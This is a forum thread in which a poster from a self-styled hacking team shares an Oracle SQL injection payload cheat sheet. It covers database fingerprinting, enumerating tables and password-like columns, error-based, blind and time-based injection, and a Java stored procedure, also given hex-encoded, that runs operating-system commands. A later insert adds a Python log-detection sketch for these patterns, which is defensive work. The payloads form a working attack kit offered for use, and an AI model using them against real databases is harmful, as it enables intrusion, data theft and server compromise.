Topic: Oracle SQL Injection Payload Examples
KingSkrupellos
Post: #1
Oracle SQL Injection Payload Examples
10.02.2019 14:54
# Oracle SQL Injection Payload Examples
***********************************
Author : KingSkrupellos
Team : Cyberizm Digital Security Team

## Oracle SQL version

Code:
```sql
SELECT user FROM dual UNION SELECT * FROM v$version
```

## Oracle SQL database name

Code:
```sql
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
```

## Oracle SQL List Databases

Code:
```sql
SELECT DISTINCT owner FROM all_tables;
```

## Oracle SQL List Column

Code:
```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
```

## Oracle SQL List Tables

Code:
```sql
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
```

## Oracle SQL Error based

Code:
| Description  | Query  |
| :------------- | :------------- |
| Invalid HTTP Request  | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
| CTXSYS.DRITHSX.SN     | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
| Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
| Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
| Invalid XML           | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |

## Oracle SQL Blind

Code:
| Description | Query |
| :------------- | :------------- |
| Version is 12.2           | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
| Subselect is enabled     | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
| Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
| First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |

## Oracle SQL Time based

Code:
```sql
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])                 comment:   -- /**/
```

## Oracle SQL Command execution

Code:
```sql
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/

BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```

or (hex encoded)

Code:
```sql
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420​636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c222061732069​6d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b707562​6c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b42​75666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e​657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528​292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e6720​7374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c69​6e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f​736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b726574​75726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e63​74696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475​726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574​696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b​'')); end;')) results FROM dual

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
___________________________________________________

$$$$$$$$$$ THE END $$$$$$$$$

We don't care what people think about us, we are proud of ourselves, we are not gonna change for anyone. I do not have my own website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
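
Added example, not part of the original post: a detection sketch that flags request lines containing the Oracle-specific functions and dictionary views listed above, after undoing URL encoding and `/**/` comment padding. The log lines, function names and technique labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific markers taken from the queries in this post, grouped by technique.
INDICATORS = {
    "fingerprint": [r"v\$version", r"v\$instance", r"v\$database", r"global_name"],
    "enumeration": [r"all_tables", r"all_tab_columns", r"user_tab_cols", r"all_users"],
    "error-based": [r"utl_inaddr\.get_host_name", r"ctxsys\.drithsx\.sn",
                    r"ord_dicom\.getmappingxpath", r"dbms_xmlgen\.getxml"],
    "time-based": [r"dbms_pipe\.receive_message"],
    "code-exec": [r"dbms_xmlquery\.getxml", r"compile\s+java\s+source",
                  r"utl_raw\.cast_to_varchar2", r"hextoraw"],
}
# Identifier boundaries keep 'global_name' from matching inside 'global_names_of_products'.
COMPILED = {k: [re.compile(r"(?<![\w$])(?:" + p + r")(?![\w$])") for p in v]
            for k, v in INDICATORS.items()}

def normalize(raw: str) -> str:
    """Undo the encodings that hide keywords from a naive substring match."""
    text = raw
    for _ in range(3):                      # handles double and triple URL encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # comments used as whitespace
    return re.sub(r"\s+", " ", text).lower()

def classify(request_line: str) -> list[str]:
    """Return the sorted technique labels whose markers appear in the request."""
    text = normalize(request_line)
    return sorted(k for k, pats in COMPILED.items() if any(p.search(text) for p in pats))

# Constructed sample request lines (not from a real log).
SAMPLE_LOG = [
    "GET /item?id=7 HTTP/1.1",
    "GET /item?id=7%20AND%201=utl_inaddr.get_host_name((select%20banner%20from%20v$version%20where%20rownum=1)) HTTP/1.1",
    "GET /item?id=7%2520AND%25201=DBMS_PIPE.RECEIVE_MESSAGE(%2527a%2527,5) HTTP/1.1",
    "GET /item?id=7/**/UNION/**/SELECT/**/table_name/**/FROM/**/all_tables HTTP/1.1",
    "GET /help?topic=global_names_of_products HTTP/1.1",
]

def scan(lines):
    """Map the index of each flagged line to its technique labels."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Matches are triage signals only; bind variables in the application and revoking `EXECUTE` on packages the application does not use are what actually close these paths.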



#Ayar
Post: #2
RE: Oracle SQL Injection Payload Examples
11.02.2019 11:42
Thanks, and well done for the effort :)

I do not have a membership on any other forum.
ayar